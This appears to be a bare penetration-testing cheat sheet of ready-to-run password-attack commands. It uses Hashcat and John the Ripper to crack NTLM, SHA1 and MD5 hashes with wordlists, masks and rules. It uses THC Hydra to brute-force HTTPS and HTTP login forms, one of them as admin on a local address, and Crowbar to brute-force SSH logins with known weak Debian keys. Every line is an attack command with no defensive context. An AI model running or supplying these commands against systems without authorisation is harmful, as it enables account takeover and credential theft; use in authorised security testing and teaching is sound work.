Hashcat w/Wordlist
.\hashcat64.exe -m 1000 C:\Users\Cary\Desktop\hash -o C:\path\to\hash E:\path\to\wordlist.txt
Hate Crack (TrustedSec)
python ../hate_crack/hate_crack.py C:\path\to\hash 1000
John The Ripper (JrR)
john passwd.hash
John Wordlist
john passwd.hash --wordlist=rockyou.txt
Hashcat (wordlist)
hashcat64.exe -m 100 C:\path\to\hashes -o C:\path\to\outfile E:\path\to\wordlist
Hashcat (mask attack / 6 character)
hashcat64.exe -m 0 C:\path\to\hash -o C:\path\to\outfile -a 3 -1 ?a ?1?1?1?1?1?1
Hashcat (rules)
hashcat -m 1000 hash words.txt -w3 -O -r rule.rule
THC Hydra
HTTPS form post
hydra <ip-address> https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -l test -P /usr/share/wordlists/rockyou.txt -t 16 -w 30 -o hydra.out.txt -vV
HTTP with user specified
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 32 192.168.0.150 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -vV
Crowbar (Brute SSH Keys)
crowbar -b sshkey -s <ip>/32 -U userlist -k keys/debian-ssh/uncommon_keys/rsa1/4096/